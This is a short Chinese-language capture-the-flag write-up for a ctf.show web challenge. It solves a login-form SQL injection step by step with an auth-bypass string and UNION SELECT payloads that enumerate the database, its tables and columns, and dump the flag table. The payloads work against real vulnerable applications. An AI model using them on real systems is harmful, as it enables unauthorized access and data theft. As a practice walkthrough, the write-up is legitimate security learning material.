ctf.show WEB模塊第2關是一個SQL注入漏洞,請求方式是POST請求,注入點是單引號字符型注入,flag就藏在當前的資料庫的flag表中,使用聯合注入獲取資料即可
在用戶名的輸入框中輸入萬能賬號 a' or true #,密碼隨便輸
登錄成功,萬能賬號生效了,并且把查詢到的用戶名顯示到了頁面中,既然有顯示位,那我們就用聯合注入進行脫庫
首先,測驗一下回顯的位置,在用戶名的輸入框中輸入一下payload,密碼還是隨便輸
a' union select 1,2,3 # 
接下來,我們修改payload中2的位置,就可以將資料回顯到頁面中了,下面獲取當前使用的資料庫,盲猜flag就藏在當前使用的資料庫中
a' union select 1,database(),3 #
資料庫有了,接下來是脫表,在用戶名的輸入框中輸入一下payload,密碼還是隨便輸
a' union select 1,
(select group_concat(table_name) from information_schema.tables
where table_schema='web2')
,3 #
接下來獲取flag表的欄位
a' union select 1,
(select group_concat(column_name) from information_schema.columns
where table_schema='web2' and table_name='flag')
,3 #
接下來獲取flag表的資料
a' union select 1,(select flag from flag),3 #
將flag的內容整體復制到輸入框中即可過關
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/295094.html
標籤:其他
下一篇:什么是SSL技術